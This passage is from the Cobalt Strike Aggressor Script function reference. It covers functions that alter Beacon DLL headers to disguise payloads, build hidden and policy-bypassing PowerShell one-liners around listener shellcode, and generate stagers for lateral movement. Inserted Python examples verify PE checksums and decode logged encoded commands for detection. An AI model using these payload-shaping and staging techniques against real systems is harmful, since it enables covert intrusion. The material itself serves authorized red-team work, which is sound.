$temp_dll = pe_set_compile_time_with_string($temp_dll, $strTime);

Back to Top

pe_set_export_name

Set the export name in the Beacon DLL Content.

Arguments

$1 - Beacon DLL content

$2 - Export name (must already exist in the string table)

Returns

Updated DLL Content

Note

The name must exist in the string table.

Example

# -------------------------------------
# name must be in strings table...
# -------------------------------------
$export_name = "WININET.dll";
$temp_dll = pe_set_export_name($temp_dll, $export_name);

$export_name = "beacon.dll";
$temp_dll = pe_set_export_name($temp_dll, $export_name);

Back to Top

pe_set_long

Places a long value at a specified location.

Arguments

$1 - Beacon DLL content

$2 - Location

$3 - Value

Returns

Updated DLL Content

Example

# ===========================================================================
# $1 = Beacon DLL content
# ===========================================================================
sub demo_pe_set_long {

   local('$temp_dll, $int_offset, $long_value');
   local('%pemap');
   local('@loc_cs, @val_cs');

   $temp_dll = $1;

   # -------------------------------------
   # Inspect the current DLL...
   # -------------------------------------
   %pemap = pedump($temp_dll);
   @loc_cs = values(%pemap, @("CheckSum.<location>"));
   @val_cs = values(%pemap, @("CheckSum.<value>"));

   if (size(@val_cs) != 1) {
      warn("Unexpected size of checksum value array: " . size(@val_cs));
   } else {
      warn("Current checksum value: " . @val_cs[0]);
   }

   if (size(@loc_cs) != 1) {
      warn("Unexpected size of checksum location array: " . size(@loc_cs));
   } else {
      warn("Current checksum location: " . @loc_cs[0]);
   }

   # -------------------------------------
   # Set parameters (parse number as base 10)
   # -------------------------------------
   $int_offset = parseNumber(@loc_cs[0], 10);
   $long_value = 98765;

   # -------------------------------------
   # pe_set_long (set a long value)
   # -------------------------------------
   # warn("pe_set_long(dll, " . $int_offset . ", " . $long_value . ")");
   $temp_dll = pe_set_long($temp_dll, $int_offset, $long_value);

   # -------------------------------------
   # Did it work?
   # -------------------------------------
   # dump_my_pe($temp_dll);

   # -------------------------------------
   # All Done!  Give back edited DLL!
   # -------------------------------------
   return $temp_dll;
}

Back to Top

pe_set_short

Places a short value at a specified location.

Arguments

$1 - Beacon DLL content

$2 - Location

$3 - Value

Returns

Updated DLL Content

Example

# ===========================================================================
# $1 = Beacon DLL content
# ===========================================================================
sub demo_pe_set_short {

   local('$temp_dll, $int_offset, $short_value');
   local('%pemap');
   local('@loc, @val');

   $temp_dll = $1;

   # -------------------------------------
   # Inspect the current DLL...
   # -------------------------------------
   %pemap = pedump($temp_dll);
   @loc = values(%pemap, @(".text.NumberOfRelocations."));
   @val = values(%pemap, @(".text.NumberOfRelocations."));

   if (size(@val) != 1) {
      warn("Unexpected size of .text.NumberOfRelocations value array: " . size(@val));
   } else {
      warn("Current .text.NumberOfRelocations value: " . @val[0]);
   }

   if (size(@loc) != 1) {
      warn("Unexpected size of .text.NumberOfRelocations location array: " . size(@loc));
   } else {
      warn("Current .text.NumberOfRelocations location: " . @loc[0]);
   }

   # -------------------------------------
   # Set parameters (parse number as base 10)
   # -------------------------------------
   $int_offset = parseNumber(@loc[0], 10);
   $short_value = 128;

   # -------------------------------------
   # pe_set_short (set a short value)
   # -------------------------------------
   # warn("pe_set_short(dll, " . $int_offset . ", " . $short_value . ")");
   $temp_dll = pe_set_short($temp_dll, $int_offset, $short_value);

   # -------------------------------------
   # Did it work?
   # -------------------------------------
   # dump_my_pe($temp_dll);

   # -------------------------------------
   # All Done!  Give back edited DLL!
   # -------------------------------------
   return $temp_dll;
}

Back to Top

pe_set_string

Places a string value at a specified location.

Arguments

$1 - Beacon DLL content

$2 - Start location

$3 - Value

Returns

Updated DLL Content

Example

# ===========================================================================
# $1 = Beacon DLL content
# ===========================================================================
sub demo_pe_set_string {

   local('$temp_dll, $location, $value');
   local('%pemap');
   local('@loc_en, @val_en');

   $temp_dll = $1;

   # -------------------------------------
   # Inspect the current DLL...
   # -------------------------------------
   %pemap = pedump($temp_dll);
   @loc_en = values(%pemap, @("Export.Name."));
   @val_en = values(%pemap, @("Export.Name."));

   if (size(@val_en) != 1) {
      warn("Unexpected size of export name value array: " . size(@val_en));
   } else {
      warn("Current export value: " . @val_en[0]);
   }

   if (size(@loc_en) != 1) {
      warn("Unexpected size of export location array: " . size(@loc_en));
   } else {
      warn("Current export name location: " . @loc_en[0]);
   }

   # -------------------------------------
   # Set parameters (parse number as base 10)
   # -------------------------------------
   $location = parseNumber(@loc_en[0], 10);
   $value = "BEECON.DLL";

   # -------------------------------------
   # pe_set_string (set a string value)
   # -------------------------------------
   # warn("pe_set_string(dll, " . $location . ", " . $value . ")");
   $temp_dll = pe_set_string($temp_dll, $location, $value);

   # -------------------------------------
   # Did it work?
   # -------------------------------------
   # dump_my_pe($temp_dll);

   # -------------------------------------
   # All Done!  Give back edited DLL!
   # -------------------------------------
   return $temp_dll;
}

Back to Top

pe_set_stringz

Places a string value at a specified location and adds a zero terminator.

Arguments

$1 - Beacon DLL content

$2 - Start location

$3 - String to set

Returns

Updated DLL Content

Example

# ===========================================================================
# $1 = Beacon DLL content
# ===========================================================================
sub demo_pe_set_stringz {

   local('$temp_dll, $offset, $value');
   local('%pemap');
   local('@loc');

   $temp_dll = $1;

   # -------------------------------------
   # Inspect the current DLL...
   # -------------------------------------
   %pemap = pedump($temp_dll);
   @loc = values(%pemap, @("Sections.AddressOfName.0."));

   if (size(@loc) != 1) {
      warn("Unexpected size of section name location array: " . size(@loc));
   } else {
      warn("Current section name location: " . @loc[0]);
   }

   # -------------------------------------
   # Set parameters (parse number as base 10)
   # -------------------------------------
   $offset = parseNumber(@loc[0], 10);
   $value = "abc";

   # -------------------------------------
   # pe_set_stringz
   # -------------------------------------
   # warn("pe_set_stringz(dll, " . $offset . ", " . $value . ")");
   $temp_dll = pe_set_stringz($temp_dll, $offset, $value);

   # -------------------------------------
   # Did it work?
   # -------------------------------------
   # dump_my_pe($temp_dll);

   # -------------------------------------
   # Set parameters
   # -------------------------------------
   # $offset = parseNumber(@loc[0], 10);
   # $value = ".tex";

   # -------------------------------------
   # pe_set_string (set a string value)
   # -------------------------------------
   # warn("pe_set_string(dll, " . $offset . ", " . $value . ")");
   # $temp_dll = pe_set_string($temp_dll, $offset, $value);

   # -------------------------------------
   # Did it work?
   # -------------------------------------
   # dump_my_pe($temp_dll);

   # -------------------------------------
   # All Done!  Give back edited DLL!
   # -------------------------------------
   return $temp_dll;
}

Back to Top

pe_set_value_at

Sets a long value based on the location resolved by a name from the PE Map (see pedump).

Arguments

$1 - Beacon DLL content

$2 - Name of location field

$3 - Value

Returns

Updated DLL Content

Example

# ===========================================================================
# $1 = DLL content
# ===========================================================================
sub demo_pe_set_value_at {

   local('$temp_dll, $name, $long_value, $date');
   local('%pemap');
   local('@loc, @val');

   $temp_dll = $1;

   # -------------------------------------
   # Inspect the current DLL...
   # -------------------------------------
   # %pemap = pedump($temp_dll);
   # @loc = values(%pemap, @("SizeOfImage."));
   # @val = values(%pemap, @("SizeOfImage."));

   # if (size(@val) != 1) {
   #   warn("Unexpected size of SizeOfImage. value array: " . size(@val));
   # } else {
   #   warn("Current SizeOfImage. value: " . @val[0]);
   # }

   # if (size(@loc) != 1) {
   #   warn("Unexpected size of SizeOfImage location array: " . size(@loc));
   # } else {
   #   warn("Current SizeOfImage. location: " . @loc[0]);
   # }

   # -------------------------------------
   # Set parameters
   # -------------------------------------
   $name = "SizeOfImage";
   $long_value = 22334455;

   # -------------------------------------
   # pe_set_value_at (set a long value at the location resolved by name)
   # -------------------------------------
   # $1 = DLL (byte array)
   # $2 = name (string)
   # $3 = value (long)
   # -------------------------------------
   warn("pe_set_value_at(dll, " . $name . ", " . $long_value . ")");
   $temp_dll = pe_set_value_at($temp_dll, $name, $long_value);

   # -------------------------------------
   # Did it work?
   # -------------------------------------
   # dump_my_pe($temp_dll);

   # -------------------------------------
   # set it back?
   # -------------------------------------
   # warn("pe_set_value_at(dll, " . $name . ", " . @val[0] . ")");
   # $temp_dll = pe_set_value_at($temp_dll, $name, @val[0]);

   # dump_my_pe($temp_dll);

   # -------------------------------------
   # All Done!  Give back edited DLL!
   # -------------------------------------
   return $temp_dll;
}

Back to Top

pe_stomp

Set a string to null characters. Starting at the specified location, sets every character to null until a null string terminator is reached.

Arguments

$1 - Beacon DLL content

$2 - Start location

Returns

Updated DLL Content

Example

# ===========================================================================
# $1 = Beacon DLL content
# ===========================================================================
sub demo_pe_stomp {

   local('$temp_dll, $location');
   local('%pemap');
   local('@loc, @val');

   $temp_dll = $1;

   # -------------------------------------
   # Inspect the current DLL...
   # -------------------------------------
   %pemap = pedump($temp_dll);
   @loc = values(%pemap, @("Sections.AddressOfName.1."));
   @val = values(%pemap, @("Sections.AddressOfName.1."));

   if (size(@val) != 1) {
      warn("Unexpected size of Sections.AddressOfName.1 value array: " . size(@val));
   } else {
      warn("Current Sections.AddressOfName.1 value: " . @val[0]);
   }

   if (size(@loc) != 1) {
      warn("Unexpected size of Sections.AddressOfName.1 location array: " . size(@loc));
   } else {
      warn("Current Sections.AddressOfName.1 location: " . @loc[0]);
   }

   # -------------------------------------
   # Set parameters (parse number as base 10)
   # -------------------------------------
   $location = parseNumber(@loc[0], 10);

   # -------------------------------------
   # pe_stomp (stomp a string at a location)
   # -------------------------------------
   # warn("pe_stomp(dll, " . $location . ")");
   $temp_dll = pe_stomp($temp_dll, $location);

   # -------------------------------------
   # Did it work?
   # -------------------------------------
   # dump_my_pe($temp_dll);

   # -------------------------------------
   # All Done!  Give back edited DLL!
   # -------------------------------------
   return $temp_dll;
}

Back to Top

pe_update_checksum

Update the checksum in the Beacon DLL Content.

Arguments

$1 - Beacon DLL content

Returns

Updated DLL Content

Note

This should be the last transformation performed.

Example

# -------------------------------------
# update checksum
# -------------------------------------
$temp_dll = pe_update_checksum($temp_dll);

Back to Top

pedump

Parse an executable Beacon into a map of the PE Header information. The parsed information can be used for research or programmatically to make changes to the Beacon.

Arguments

$1 - Beacon DLL content

Returns

A map of the parsed information. The map data is very similar to the "./peclone dump [file]" command output.

Example

# ===========================================================================
# 'case insensitive sort' from sleep manual...
# ===========================================================================
sub caseInsensitiveCompare
{
   $a = lc($1);
   $b = lc($2);
   return $a cmp $b;
}

# ===========================================================================
# Dump PE Information
# $1 = Beacon DLL content
# ===========================================================================
sub dump_my_pe {
   local('$out $key $val %pemap @sorted_keys');

   %pemap = pedump($1);

   # ---------------------------------------------------
   # Example listing all items from hash/map...
   # ---------------------------------------------------
   @sorted_keys = sort(&caseInsensitiveCompare, keys(%pemap));
   foreach $key (@sorted_keys)
   {
      $out = "$[50]key";
      foreach $val (values(%pemap, @($key)))
      {
         $out .= " $val";
      }
      println($out);
   }

   # ---------------------------------------------------
   # Example of grabbing specific items from hash/map...
   # ---------------------------------------------------
   local('@loc_cs @val_cs');
   @loc_cs = values(%pemap, @("CheckSum.<location>"));
   @val_cs = values(%pemap, @("CheckSum.<value>"));

   println("");
   println("My DLL CheckSum Location: " . @loc_cs);
   println("My DLL CheckSum Value: " . @val_cs);
   println("");
}

See also

./peclone dump [file]
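The following is an added example in Python (not Aggressor Script, and not Cobalt Strike's own code) that shows the kind of information pedump exposes and what pe_update_checksum has to recompute. It parses the header fields a reviewer checks first (TimeDateStamp, CheckSum together with its file offset, SizeOfImage, section names), computes the standard PE image checksum, and reports whether the stored value still matches the image. The two-section PE32+ image it works on is constructed inside the block (build_minimal_pe) and is not a Beacon DLL. TimeDateStamp holds seconds, while pe_set_compile_time_with_long above takes milliseconds, so build_minimal_pe divides by 1000.

```python
# Added example (Python, not Aggressor Script, not Cobalt Strike code): parse the PE
# header fields that pedump reports and verify the CheckSum field the way
# pe_update_checksum would recompute it. The sample image is constructed below.
import datetime
import struct

COFF_FMT = "<HHIIIHH"                                      # IMAGE_FILE_HEADER (20 bytes)
OPT64_FMT = "<HBBIIIIIQIIHHHHHHIIIIHHQQQQII" + "II" * 16   # IMAGE_OPTIONAL_HEADER64 (240 bytes)
SECTION_FMT = "<8sIIIIIIHHI"                               # IMAGE_SECTION_HEADER (40 bytes)


def checksum_offset(data):
    """File offset of IMAGE_OPTIONAL_HEADER.CheckSum (optional header + 64, PE32 and PE32+)."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return e_lfanew + 4 + 20 + 64


def pe_checksum(data):
    """Standard PE image checksum: ones'-complement sum of the 16-bit words
    (end-around carry), with the CheckSum field itself skipped, plus the file length."""
    skip = checksum_offset(data)
    padded = data + b"\x00" * (len(data) % 2)
    total = 0
    for off in range(0, len(padded), 2):
        if skip <= off < skip + 4:
            continue                                    # the field being computed counts as zero
        total += struct.unpack_from("<H", padded, off)[0]
        total = (total & 0xFFFF) + (total >> 16)
    return ((total & 0xFFFF) + (total >> 16) + len(data)) & 0xFFFFFFFF


def update_checksum(data):
    """Counterpart of pe_update_checksum: store the recomputed value. Do this last,
    because any later edit to the image invalidates it."""
    out = bytearray(data)
    struct.pack_into("<I", out, checksum_offset(data), pe_checksum(data))
    return bytes(out)


def parse_pe(data):
    """A small subset of what pedump reports: value and file offset of the fields
    a tamper review looks at first."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    coff_off = e_lfanew + 4
    machine, nsections, stamp, _, _, opt_size, _ = struct.unpack_from(COFF_FMT, data, coff_off)
    opt_off = coff_off + 20
    sections = []
    for i in range(nsections):
        hdr_off = opt_off + opt_size + 40 * i
        f = struct.unpack_from(SECTION_FMT, data, hdr_off)
        sections.append({"name": f[0].rstrip(b"\0").decode("ascii", "replace"),
                         "name_offset": hdr_off, "virtual_address": f[2],
                         "raw_size": f[3], "raw_offset": f[4]})
    when = datetime.datetime.fromtimestamp(stamp, datetime.timezone.utc)
    return {
        "machine": machine,
        "timestamp": stamp,                             # seconds since the epoch
        "compile_time": when.strftime("%d %b %Y %H:%M:%S UTC"),
        "size_of_image": struct.unpack_from("<I", data, opt_off + 56)[0],
        "checksum": struct.unpack_from("<I", data, opt_off + 64)[0],
        "checksum_offset": opt_off + 64,
        "sections": sections,
    }


def checksum_matches(data):
    """False means the image was modified after its checksum was written (or never had one)."""
    return parse_pe(data)["checksum"] == pe_checksum(data)


def build_minimal_pe(compile_time_ms, checksum=0):
    """Constructed sample: a two-section PE32+ DLL skeleton with filler bytes. It is
    not a Beacon DLL and does not load; it only exercises the header logic above."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                     # e_lfanew
    coff = struct.pack(COFF_FMT, 0x8664, 2, compile_time_ms // 1000, 0, 0, 240, 0x2022)
    opt = struct.pack(OPT64_FMT, 0x20B, 14, 0, 0x200, 0x200, 0, 0x1000, 0x1000, 0x180000000,
                      0x1000, 0x200, 6, 0, 0, 0, 6, 0, 0, 0x3000, 0x200, checksum, 2, 0x160,
                      0x100000, 0x1000, 0x100000, 0x1000, 0, 16, *([0] * 32))
    secs = struct.pack(SECTION_FMT, b".text", 0x200, 0x1000, 0x200, 0x200, 0, 0, 0, 0, 0x60000020)
    secs += struct.pack(SECTION_FMT, b".rdata", 0x200, 0x2000, 0x200, 0x400, 0, 0, 0, 0, 0x40000040)
    headers = (bytes(dos) + b"PE\0\0" + coff + opt + secs).ljust(0x200, b"\0")
    return headers + b"\xCC" * 0x200 + b"constructed sample\0".ljust(0x200, b"\0")


if __name__ == "__main__":
    dll = update_checksum(build_minimal_pe(1700000001000))
    info = parse_pe(dll)
    print(info["compile_time"], hex(info["checksum"]), [s["name"] for s in info["sections"]])
    tampered = bytearray(dll)
    tampered[info["sections"][0]["name_offset"]] = ord("X")     # an edit made after the checksum was set
    print("checksum still valid:", checksum_matches(bytes(tampered)))
```

A CheckSum that no longer matches the image is a cheap tamper indicator for a DLL that shipped with a valid one, which is also why the note above says pe_update_checksum must be the last transformation: the __main__ demo changes one byte of a section name after the checksum was written and the verification fails until the value is recomputed.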

Back to Top

pgraph

Generate the pivot graph GUI component.

Returns

The pivot graph GUI object (a javax.swing.JComponent)

Example

addVisualization("Pivot Graph", pgraph());

See also

&showVisualization

Back to Top

pivots

Returns a list of SOCKS pivots from Cobalt Strike's data model.

Returns

An array of dictionary objects with information about each pivot.

Example

printAll(pivots());

Back to Top

popup_clear

Remove all popup menus associated with the current menu. This is a way to override Cobalt Strike's default popup menu definitions.

Arguments

$1 - the popup hook to clear registered menus for

Example

popup_clear("help");

popup help {
   item "My stuff!" {
      show_message("This is my menu!");
   }
}

Back to Top

powershell

DEPRECATED This function is deprecated in Cobalt Strike 4.0. Use &artifact_stager and &powershell_command instead.

Returns a PowerShell one-liner to bootstrap the specified listener.

Arguments

$1 - the listener name

$2 - [true/false]: is this listener targeting local host?

$3 - x86|x64 - the architecture of the generated stager.

Notes

Be aware that not all listener configurations have x64 stagers. If in doubt, use x86.

Returns

A PowerShell one-liner to run the specified listener.

Example

println(powershell("my listener", false));

Back to Top

powershell_command

Returns a one-liner to run a PowerShell expression (e.g., powershell.exe -nop -w hidden -encodedcommand MgAgACsAIAAyAA==)

Arguments

$1 - the PowerShell expression to wrap into a one-liner.

$2 - will the PowerShell command run on a remote target?

Returns

Returns a powershell.exe one-liner to run the specified expression.

Example

$cmd = powershell_command("2 + 2", false);
println($cmd);
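The following is an added example in Python (not Aggressor Script, and not Cobalt Strike's own code) showing the detection-side inverse of powershell_command: given a logged process command line, it recovers the script text carried in -EncodedCommand, which is base64 over UTF-16LE, as the MgAgACsAIAAyAA== example above illustrates. PowerShell accepts any unambiguous prefix of the switch name (-e, -ec, -enc, ...), and loggers or operators often drop the base64 padding, so the decoder tolerates both. The log lines in SAMPLE_LOG are constructed.

```python
# Added example (Python, not Aggressor Script, not Cobalt Strike code): decode the
# -EncodedCommand argument out of a logged command line.
import base64

SWITCH = "encodedcommand"


def decode_encoded_command(cmdline):
    """Return the decoded script text, or None if the command line carries no
    valid -EncodedCommand argument."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        name = tok[1:].lower()
        if tok[:1] not in "-/" or not name or not SWITCH.startswith(name):
            continue                                  # not the switch (e.g. -ep, -nop, /c)
        blob = tokens[i + 1].strip("'\"")
        blob += "=" * (-len(blob) % 4)                # restore stripped base64 padding
        try:
            raw = base64.b64decode(blob, validate=True)
        except ValueError:                            # binascii.Error is a ValueError
            return None
        return raw.decode("utf-16-le", errors="replace")   # PowerShell expects UTF-16LE
    return None


# Constructed sample log lines (process-creation events, command line only).
SAMPLE_LOG = [
    "CommandLine: powershell.exe -nop -w hidden -encodedcommand MgAgACsAIAAyAA==",
    'CommandLine: powershell.exe -ep bypass -c "Get-Date"',
    "CommandLine: cmd.exe /c powershell -e RwBlAHQALQBEAGEAdABlAA",
]


def scan_log(lines):
    """Return (line number, decoded script) for every line carrying an encoded command."""
    hits = []
    for n, line in enumerate(lines, 1):
        text = decode_encoded_command(line)
        if text is not None:
            hits.append((n, text))
    return hits


if __name__ == "__main__":
    for n, text in scan_log(SAMPLE_LOG):
        print(f"line {n}: {text!r}")
```

The decoded text, not the base64 blob, is what detection content should match on, since the same script encodes differently as soon as one character changes.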

Back to Top

powershell_compress

Compresses a PowerShell script and wraps it in a script to decompress and execute it.

Arguments

$1 - the PowerShell script to compress.

Example

$script = powershell_compress("2 + 2");

Back to Top

powershell_encode_oneliner

DEPRECATED This function is deprecated in Cobalt Strike 4.0. Use &powershell_command instead.

Returns a one-liner to run a PowerShell expression (e.g., powershell.exe -nop -w hidden -encodedcommand MgAgACsAIAAyAA==)

Arguments

$1 - the PowerShell expression to wrap into a one-liner.

Returns a powershell.exe one-liner to run the specified expression.

Example

$cmd = powershell_encode_oneliner("2 + 2");
println($cmd);

Back to Top

powershell_encode_stager

DEPRECATED This function is deprecated in Cobalt Strike 4.0. Use &artifact_general and &powershell_command instead.

Returns a base64 encoded PowerShell script to run the specified shellcode

Arguments

$1 - shellcode to wrap

Returns

Returns a base64 encoded PowerShell suitable for use with powershell.exe's -enc option.

Example

$shellcode  = shellcode("my listener", false);
$readytouse = powershell_encode_stager($shellcode);
println("powershell.exe -ep bypass -enc $readytouse");

Back to Top

pref_get

Grabs a string value from Cobalt Strike's preferences.

Arguments

$1 - the preference name

$2 - the default value [if there is no value for this preference]

Returns

A string with the preference value.

Example

$foo = pref_get("foo.string", "bar");

Back to Top

pref_get_list

Grabs a list value from Cobalt Strike's preferences.

Arguments

$1 - the preference name

Returns

An array with the preference values

Example

@foo = pref_get_list("foo.list");

Back to Top

pref_set

Set a value in Cobalt Strike's preferences

Arguments

$1 - the preference name

$2 - the preference value

Example

pref_set("foo.string", "baz!");

Back to Top

pref_set_list

Stores a list value into Cobalt Strike's preferences.

Arguments

$1 - the preference name

$2 - an array of values for this preference

Example

pref_set_list("foo.list", @("a", "b", "c"));

Back to Top

previousTab

Activate the tab that is to the left of the current tab.

Example

bind Ctrl+Left {
   previousTab();
}

Back to Top

process_browser

Opens the Process Browser. This function does not have any parameters.

Back to Top

privmsg

Post a private message to a user in the event log

Arguments

$1 - who to send the message to

$2 - the message

Example

privmsg("raffi", "what's up man?");

Back to Top

prompt_confirm

Show a dialog with Yes/No buttons. If the user presses yes, call the specified function.

Arguments

$1 - text in the dialog

$2 - title of the dialog

$3 - a callback function. Called when the user presses yes.

Example

prompt_confirm("Do you feel lucky?", "Do you?", {
   show_message("Ok, I got nothing");
});

Back to Top

prompt_directory_open

Show a directory open dialog.

Arguments

$1 - title of the dialog

$2 - default value

$3 - true/false: allow user to select multiple folders?

$4 - a callback function. Called when the user chooses a folder. The argument to the callback is the selected folder. If multiple folders are selected, they will still be specified as the first argument, separated by commas.

Example

prompt_directory_open("Choose a folder", $null, false, {
   show_message("You chose: $1");
});

Back to Top

prompt_file_open

Show a file open dialog.

Arguments

$1 - title of the dialog

$2 - default value

$3 - true/false: allow user to select multiple files?

$4 - a callback function. Called when the user chooses a file to open. The argument to the callback is the selected file. If multiple files are selected, they will still be specified as the first argument, separated by commas.

Example

prompt_file_open("Choose a file", $null, false, {
   show_message("You chose: $1");
});

Back to Top

prompt_file_save

Show a file save dialog.

Arguments

$1 - default value

$2 - a callback function. Called when the user chooses a filename. The argument to the callback is the desired file.

Example

prompt_file_save($null, {
   local('$handle');
   $handle = openf("> $+ $1");
   println($handle, "I am content");
   closef($handle);
});

Back to Top

prompt_text

Show a dialog that asks the user for text.

Arguments

$1 - text in the dialog

$2 - default value in the text field.

$3 - a callback function. Called when the user presses OK. The first argument to this callback is the text the user provided.

Example

prompt_text("What is your name?", "Cyber Bob", {
   show_message("Hi $1 $+ , nice to meet you!");
});

Back to Top

range

Generate an array of numbers based on a string description of ranges.

Arguments

$1 - a string with a description of ranges

Range    Result
103      The number 103
3-8      The numbers 3, 4, 5, 6, and 7.
2,4-6    The numbers 2, 4, and 5.

Returns

An array of numbers within the specified ranges.

Example

printAll(range("2,4-6"));
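The following is an added example in Python (not Aggressor Script, and not Cobalt Strike's implementation of range) that parses the syntax described above with the semantics the table gives: a lone number, or a-b with an exclusive upper bound, so "3-8" yields 3 through 7, joined by commas.

```python
# Added example (Python, not Aggressor Script): parser for the range syntax above.
def parse_range(spec):
    """Expand "103", "3-8" or "2,4-6" (whitespace tolerated) into a list of ints."""
    result = []
    for part in spec.split(","):
        part = part.strip()
        if not part:
            raise ValueError(f"empty range element in {spec!r}")
        lo, sep, hi = part.partition("-")
        if not sep:
            result.append(int(lo))                  # a single number
            continue
        start, end = int(lo), int(hi)
        if end < start:
            raise ValueError(f"descending range {part!r}")
        result.extend(range(start, end))            # exclusive upper bound, as documented
    return result


if __name__ == "__main__":
    print(parse_range("2,4-6"))
```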

Back to Top

redactobject

Removes a post-exploitation object (e.g., screenshot, keystroke buffer) from the user interface.

Arguments

$1 - the ID of the post-exploitation object.

Back to Top

removeTab

Close the active tab

Example

bind Ctrl+D {
   removeTab();
}

Back to Top

resetData

Reset Cobalt Strike's data model.

Back to Top

say

Post a public chat message to the event log.

Arguments

$1 - the message

Example

say("Hello World!");

Back to Top

sbrowser

Generate the session browser GUI component. Shows Beacon AND SSH sessions.

Returns

The session browser GUI object (a javax.swing.JComponent)

Example

addVisualization("Session Browser", sbrowser());

See also

&showVisualization

Back to Top

screenshots

Returns a list of screenshots from Cobalt Strike's data model.

Returns

An array of dictionary objects with information about each screenshot.

Example

printAll(screenshots());

Back to Top

script_resource

Returns the full path to a resource that is stored relative to this script file.

Arguments

$1 - the file to get a path for

Returns

The full path to the specified file.

Example

println(script_resource("dummy.txt"));

Back to Top

separator

Insert a separator into the current menu tree.

Example

popup foo {
   item "Stuff" { ... }
   separator();
   item "Other Stuff" { ... }
}

Back to Top

services

Returns a list of services in Cobalt Strike's data model.

Returns

An array of dictionary objects with information about each service.

Example

printAll(services());

Back to Top

setup_reflective_loader

Insert the reflective loader executable code into a beacon payload.

Arguments

$1 - Original beacon executable payload.

$2 - User defined Reflective Loader executable data.

Returns

The beacon executable payload updated with the user defined reflective loader. $null if there is an error.

Notes

The user defined Reflective Loader must be less than 5k.

Example

See BEACON_RDLL_GENERATE hook

# ---------------------------------------------------------------------
# Replace the beacons default loader with '$loader'.
# ---------------------------------------------------------------------
$temp_dll = setup_reflective_loader($2, $loader);

Back to Top

setup_strings

Apply the strings defined in the Malleable C2 profile to the beacon payload.

Arguments

$1 - beacon payload to modify

Returns

The updated beacon payload with the defined strings applied to the payload.

Example

See BEACON_RDLL_GENERATE hook

# Apply strings to the beacon payload.
$temp_dll = setup_strings($temp_dll);

Back to Top

setup_transformations

Apply the transformations rules defined in the Malleable C2 profile to the beacon payload.

Arguments

$1 - Beacon payload to modify

$2 - Beacon architecture (x86/x64)

Returns

The updated beacon payload with the transformations applied to the payload.

Example

See BEACON_RDLL_GENERATE hook

# Apply the transformations to the beacon payload.
$temp_dll = setup_transformations($temp_dll, $arch);

Back to Top

shellcode

DEPRECATED This function is deprecated in Cobalt Strike 4.0. Use &stager instead.

Returns raw shellcode for a specific Cobalt Strike listener

Arguments

$1 - the listener name

$2 - true/false: is this shellcode destined for a remote target?

$3 - x86|x64 - the architecture of the stager output.

Note

Be aware that not all listener configurations have x64 stagers. If in doubt, use x86.

Returns

A scalar containing shellcode for the specified listener.

Example

$data = shellcode("my listener", false, "x86");

$handle = openf(">out.bin");
writeb($handle, $data);
closef($handle);

Back to Top

showVisualization

Switch Cobalt Strike visualization to a registered visualization.

Arguments

$1 - the name of the visualization

Example

bind Ctrl+H {
   showVisualization("Hello World");
}

See also

&showVisualization

Back to Top

show_error

Shows an error message to the user in a dialog box. Use this function to relay error information.

Arguments

$1 - the message text

Example

show_error("You did something bad.");

Back to Top

show_message

Shows a message to the user in a dialog box. Use this function to relay information.

Arguments

$1 - the message text

Example

show_message("You've won a free ringtone");

Back to Top

site_host

Host content on Cobalt Strike's web server

Arguments

$1 - the host for this site (&localip is a good default)

$2 - the port (e.g., 80)

$3 - the URI (e.g., /foo)

$4 - the content to host (as a string)

$5 - the mime-type (e.g., "text/plain")

$6 - a description of the content. Shown in Site Management -> Manage.

$7 - use SSL or not (true or false)

Returns

The URL to this hosted site

Example

site_host(localip(), 80, "/", "Hello World!", "text/plain", "Hello World Page", false);

Back to Top

site_kill

Remove a site from Cobalt Strike's web server

Arguments

$1 - the port

$2 - the URI

Example

# removes the content bound to / on port 80
site_kill(80, "/");

Back to Top

sites

Returns a list of sites tied to Cobalt Strike's web server.

Returns

An array of dictionary objects with information about each registered site.

Example

printAll(sites());

Back to Top

ssh_command_describe

Describe an SSH command.

Arguments

$1 - the command

Returns

A string description of the SSH command.

Example

println(ssh_command_describe("sudo"));

Back to Top

ssh_command_detail

Get the help information for an SSH command.

Arguments

$1 - the command

Returns

A string with helpful information about an SSH command.

Example

println(ssh_command_detail("sudo"));

Back to Top

ssh_command_register

Register help information for an SSH console command.

Arguments

$1 - the command

$2 - the short description of the command

$3 - the long-form help for the command.

Example

ssh_alias echo {
   blog($1, "You typed: " . substr($1, 5));
}

ssh_command_register(
   "echo", 
   "echo posts to the current session's log", 
   "Synopsis: echo [arguments]\n\nLog arguments to the SSH console");

Back to Top

ssh_commands

Get a list of SSH commands.

Returns

An array of SSH commands.

Example

printAll(ssh_commands());

Back to Top

stager

Returns the stager for a specific Cobalt Strike listener

Arguments

$1 - the listener name

$2 - x86|x64 - the architecture of the stager output.

Note

Be aware that not all listener configurations have x64 stagers. If in doubt, use x86.

Returns

A scalar containing shellcode for the specified listener.

Example

$data = stager("my listener", "x86");

$handle = openf(">out.bin");
writeb($handle, $data);
closef($handle);

Back to Top

stager_bind_pipe

Returns a bind_pipe stager for a specific Cobalt Strike listener. This stager is suitable for use in lateral movement actions that benefit from a small named pipe stager. Stage with &beacon_stage_pipe.

Arguments

$1 - the listener name

Returns

A scalar containing x86 bind_pipe shellcode.

Example

# step 1. generate our stager
$stager = stager_bind_pipe("my listener");

# step 2. do something to run our stager

# step 3. stage a payload via this stager
beacon_stage_pipe($bid, $target, "my listener", "x86");

# step 4. assume control of the payload (if needed)
beacon_link($bid, $target, "my listener");

See also

&artifact_general

Back to Top

stager_bind_tcp

Returns a bind_tcp stager for a specific Cobalt Strike listener. This stager is suitable for use in localhost-only actions that require a small stager. Stage with &beacon_stage_tcp.

Arguments

$1 - the listener name

$2 - x86|x64 - the architecture of the stager output.

$3 - the port to bind to

Returns

A scalar containing bind_tcp shellcode

Example

# step 1. generate our stager
$stager = stager_bind_tcp("my listener", "x86", 1234);

# step 2. do something to run our stager

# step 3. stage a payload via this stager
beacon_stage_tcp($bid, $target, 1234, "my listener", "x86");

# step 4. assume control of the payload (if needed)
beacon_link($bid, $target, "my listener");

See also

&artifact_general

Back to Top

str_chunk

Chunk a string into multiple parts

Arguments

$1 - the string to chunk

$2 - the maximum size of each chunk

Returns

The original string split into multiple chunks

Example

# hint... :)
else if ($1 eq "template.x86.ps1") {
